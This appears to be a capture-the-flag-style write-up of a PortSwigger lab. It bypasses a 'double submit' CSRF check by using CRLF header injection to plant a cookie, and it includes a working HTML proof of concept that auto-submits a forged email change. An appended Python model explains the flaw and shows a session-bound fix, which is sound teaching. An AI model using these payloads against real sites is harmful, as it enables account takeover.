CSRF Where Token is duplicated in Cookie | 2023

Portswigger Cross-Site Request Forgery Lab Simple Solution | Karthikeyan Nagaraj

Karthikeyan Nagaraj
InfoSec Write-ups


CSRF — Introduction:

  • Cross-Site Request Forgery (CSRF) is a web application vulnerability in which an attacker causes a victim's browser to send a request the victim never intended, to a site where the victim is already authenticated.
  • It works because the browser automatically attaches the site's credentials (session cookies, HTTP Basic credentials) to every request to that site, whether the request originated from the site itself or from a page the attacker controls.
  • If the application relies on those ambient credentials alone, it cannot tell a forged request from a genuine one, so the attacker can trigger state-changing actions such as changing the account's password or email address or transferring funds. The attacker does not get to read the response (the same-origin policy prevents that), so the impact is the action itself, not data disclosure.
  • For example, if a user is logged in to their online banking site and visits a malicious page, that page can submit a transfer request that the bank processes as the user's own.

Lab Description:

  • This lab’s email change functionality is vulnerable to CSRF. It attempts to use the insecure “double submit” CSRF prevention technique.
  • To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.
  • You can log in to your own account using the following credentials: wiener:peter

Analysis:

1. The email change functionality is known to be vulnerable, so log in as wiener:peter, submit an email change through the UI and capture the POST /my-account/change-email request in Burp Proxy.

2. Send the request to Repeater. The body carries a csrf parameter, and the same value is also present as a csrf cookie: the "double submit" check only compares the two, without binding either of them to the user's session.

3. Perform a search, send the resulting GET /?search=... request to Repeater and observe that the search term is reflected, unencoded, into a Set-Cookie header of the response.

4. The search endpoint has no CSRF protection (it is a plain GET) and does not strip carriage return or line feed characters, so a cross-site request to a crafted search URL makes the server emit an attacker-chosen Set-Cookie header (HTTP header injection). Any page the victim visits can therefore plant cookies in the victim's browser for the lab domain.

5. Build a URL that uses this to inject a fake csrf cookie. %0d%0a is CRLF, which terminates the reflected header and starts a new one, and %3b is the ';' that introduces the attribute list:

/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None

SameSite=None is required: a browser that defaults cookies to Lax would otherwise withhold the injected cookie from the cross-site POST that follows. Current Chrome also rejects SameSite=None cookies that are not marked Secure, so against a real browser over HTTPS append %3b%20Secure as well.

6. Generate a CSRF PoC for the captured change-email request (Burp Suite Professional: right-click the request, Engagement tools > Generate CSRF PoC).

7. Edit the PoC so the csrf form field and the injected cookie carry the same value (abc below), and add the <img> tag that performs the cookie injection and then submits the form:

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<!-- Hide the exploit server URL from the address bar while the page runs -->
<script>history.pushState('', '', '/')</script>
<!-- The forged request: the csrf field must equal the cookie value injected below -->
<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="abc&#64;gmail&#46;com" />
<input type="hidden" name="csrf" value="abc" />
<input type="submit" value="Submit request" />
</form>
<!-- Step 1: the browser fetches the search URL; the reflected CRLF splits the
     Set-Cookie header and plants csrf=abc (SameSite=None so it is sent on the
     cross-site POST). Step 2: the response is HTML, not an image, so onerror
     fires once the response (and its cookie) has arrived, then submits the form. -->
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=abc%0d%0aSet-Cookie:%20csrf=abc%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
</body>
</html>

8. Paste the finished HTML into the exploit server, click Store, then Deliver exploit to victim. The victim's browser requests the image, receives the forged csrf cookie, and the onerror handler submits the form; cookie and form field match, so the server accepts the request and changes the email.
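To see exactly why the double-submit check accepts the forged request, and what a check that survives planted cookies looks like, here is an added Python model of the exchange. It is not code from the write-up or from PortSwigger: the lab host is the write-up's YOUR-LAB-ID placeholder, the LastSearchTerm cookie name, the victim session id and the server key are assumptions, and the two check functions stand in for the lab's server-side logic.

```python
"""Added example (not from the write-up): why the lab's "double submit" CSRF
check falls to cookie injection, and a session-bound check that does not.

Assumptions: the lab host is the write-up's placeholder, the reflected cookie
is called LastSearchTerm, and the server key / session id are constructed."""
from __future__ import annotations

import hashlib
import hmac
import secrets
from urllib.parse import quote, unquote

LAB_HOST = "YOUR-LAB-ID.web-security-academy.net"   # placeholder from the write-up


def build_injection_url(cookie_name: str, cookie_value: str) -> str:
    """Search URL whose term ends the reflected Set-Cookie header with CRLF and
    starts a second, attacker-chosen one. SameSite=None is needed so the
    browser attaches the forged cookie to the later cross-site POST."""
    term = f"test\r\nSet-Cookie: {cookie_name}={cookie_value}; SameSite=None"
    return f"https://{LAB_HOST}/?search=" + quote(term, safe="=:")


def vulnerable_search_headers(search_term: str) -> list[tuple[str, str]]:
    """Model of the lab's search endpoint: the raw term is reflected into a
    Set-Cookie header with no CR/LF filtering (cookie name is an assumption).
    Returns the response headers as (name, value) pairs, one per line."""
    raw = f"Set-Cookie: LastSearchTerm={search_term}"
    headers = []
    for line in raw.split("\r\n"):
        name, _, value = line.partition(": ")
        headers.append((name, value))
    return headers


def apply_set_cookies(jar: dict[str, str], headers) -> dict[str, str]:
    """Browser side: every Set-Cookie header stores its name=value pair
    (attributes after the first ';' are ignored in this model)."""
    for name, value in headers:
        if name.lower() == "set-cookie":
            cookie, _, _attrs = value.partition(";")
            key, _, val = cookie.partition("=")
            jar[key.strip()] = val.strip()
    return jar


def double_submit_check(cookies: dict[str, str], form: dict[str, str]) -> bool:
    """The lab's scheme: accept when the csrf form field equals the csrf cookie.
    Nothing ties either value to the session, so whoever can plant the cookie
    can also supply the matching field."""
    cookie_token = cookies.get("csrf", "")
    form_token = form.get("csrf", "")
    return bool(cookie_token) and hmac.compare_digest(cookie_token, form_token)


SERVER_KEY = secrets.token_bytes(32)   # constructed: a secret only the server holds


def issue_bound_token(session_id: str) -> str:
    """Session-bound token: HMAC of the session id under the server key."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def bound_check(cookies: dict[str, str], form: dict[str, str]) -> bool:
    """Hardened check: the form field must equal the MAC of the session cookie.
    An attacker who plants csrf=abc cannot compute HMAC(key, victim session),
    and a planted csrf cookie is simply never consulted."""
    expected = issue_bound_token(cookies.get("session", ""))
    return hmac.compare_digest(expected, form.get("csrf", ""))


def simulate_attack(check) -> bool:
    """Logged-in victim visits the attacker's page. Returns whether the given
    server-side check accepts the forged change-email POST."""
    jar = {"session": "victim-session-id"}            # constructed session cookie
    # 1. <img src=...>: cross-site GET to the crafted search URL; the split
    #    Set-Cookie header plants csrf=abc in the victim's cookie jar.
    url = build_injection_url("csrf", "abc")
    term = unquote(url.split("search=", 1)[1])
    apply_set_cookies(jar, vulnerable_search_headers(term))
    # 2. onerror submits the form; the browser attaches the whole jar.
    form = {"email": "abc@gmail.com", "csrf": "abc"}
    return check(jar, form)


def legitimate_request_ok() -> bool:
    """Sanity check: a genuine user with a server-issued token still passes."""
    jar = {"session": "victim-session-id"}
    token = issue_bound_token(jar["session"])
    jar["csrf"] = token
    return bound_check(jar, {"email": "new@example.com", "csrf": token})


if __name__ == "__main__":
    print("injection URL :", build_injection_url("csrf", "abc"))
    print("double submit :", "BYPASSED" if simulate_attack(double_submit_check) else "blocked")
    print("session-bound :", "BYPASSED" if simulate_attack(bound_check) else "blocked")
    print("legit request :", "ok" if legitimate_request_ok() else "rejected")
```

The model separates the three parts that the single `<img>` tag in the PoC collapses: the server reflecting the term into a header, the browser honouring the second Set-Cookie line, and the check that only asks "do the two copies match?". Binding the token to the session (here by MAC-ing the session id with a server secret, compared in constant time) removes the property the attack relies on: being able to set the cookie no longer lets you predict the value the server expects, and the cookie copy stops carrying any authority at all.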

Feel free to ask queries via LinkedIn and to buy me a coffee : )

Thank you for Reading!!

Happy Hunting ~

Author : karthikeyan Nagaraj ~ Cyberw1ng

